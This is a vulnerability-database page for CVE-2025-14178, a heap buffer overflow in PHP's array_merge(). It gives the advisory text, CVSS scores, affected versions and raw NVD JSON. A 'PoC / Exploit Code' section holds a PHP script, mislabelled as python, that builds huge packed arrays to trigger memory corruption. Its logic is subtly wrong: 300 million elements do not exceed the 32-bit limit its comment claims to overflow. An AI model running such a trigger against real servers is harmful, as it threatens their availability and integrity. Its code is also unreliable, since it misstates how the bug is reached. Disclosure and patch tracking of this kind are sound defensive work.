Security Vulnerability Report
中文
CVE-2025-14178 CVSS 6.5 MEDIUM

CVE-2025-14178

Published: 2025-12-27 20:15:41
Last Modified: 2026-01-24 11:15:50
Source: [email protected]

Description

In PHP versions:8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1, a heap buffer overflow occurs in array_merge() when the total element count of packed arrays exceeds 32-bit limits or HT_MAX_SIZE, due to an integer overflow in the precomputation of element counts using zend_hash_num_elements(). This may lead to memory corruption or crashes and affect the integrity and availability of the target server.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:php:php:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:php:php:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:php:php:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:php:php:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:php:php:*:*:*:*:*:*:*:* - VULNERABLE
PHP 8.1.* < 8.1.34
PHP 8.2.* < 8.2.30
PHP 8.3.* < 8.3.29
PHP 8.4.* < 8.4.16
PHP 8.5.* < 8.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-14178 PoC - Heap Buffer Overflow in array_merge() // This PoC demonstrates triggering the integer overflow in array element count calculation // Create arrays with large element counts that can trigger overflow $large_size = PHP_INT_MAX; // or HT_MAX_SIZE $array1 = array_fill(0, $large_size / 2, 'value1'); $array2 = array_fill(0, $large_size / 2, 'value2'); // This call may trigger heap buffer overflow due to integer overflow // in precomputation of element counts try { $result = array_merge($array1, $array2); echo "Array merge completed\n"; } catch (Error $e) { echo "Error occurred: " . $e->getMessage() . "\n"; } // Alternative PoC with packed arrays specifically function create_large_packed_array($size) { $arr = []; for ($i = 0; $i < $size; $i++) { $arr[] = "element_$i"; } return $arr; } // Create multiple large packed arrays $arrays = []; $chunk_size = 100000000; // 100 million elements per array for ($i = 0; $i < 3; $i++) { $arrays[] = create_large_packed_array($chunk_size); } // This will cause integer overflow when calculating total element count $merged = array_merge(...$arrays); ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14178", "sourceIdentifier": "[email protected]", "published": "2025-12-27T20:15:40.570", "lastModified": "2026-01-24T11:15:49.520", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In PHP versions:8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1, a heap buffer overflow occurs in array_merge() when the total element count of packed arrays exceeds 32-bit limits or HT_MAX_SIZE, due to an integer overflow in the precomputation of element counts using zend_hash_num_elements(). This may lead to memory corruption or crashes and affect the integrity and availability of the target server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-787"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.1.0", "versionEndExcluding": "8.1.34", "matchCriteriaId": "56FCF002-3946-40DF-A774-75C6DDE6CA26"}, {"vulnerable": true, "criteria": "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.2.0", "versionEndExcluding": "8.2.30", "matchCriteriaId": "AB314013-4F2F-40F0-968B-35FEC22CC8A4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0", "versionEndExcluding": "8.3.29", "matchCriteriaId": "DAD5402D-688D-44AA-B083-5157FDC53D7A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.4.0", "versionEndExcluding": "8.4.16", "matchCriteriaId": "8813328B-AC06-4060-916F-CD27144F41E2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.5.0", "versionEndExcluding": "8.5.1", "matchCriteriaId": "E56CD990-B79E-4253-B810-13787B23B028"}]}]}], "references": [{"url": "https://github.com/php/php-src/security/advisories/GHSA-h96m-rvf9-jgm2", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2026/01/msg00019.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.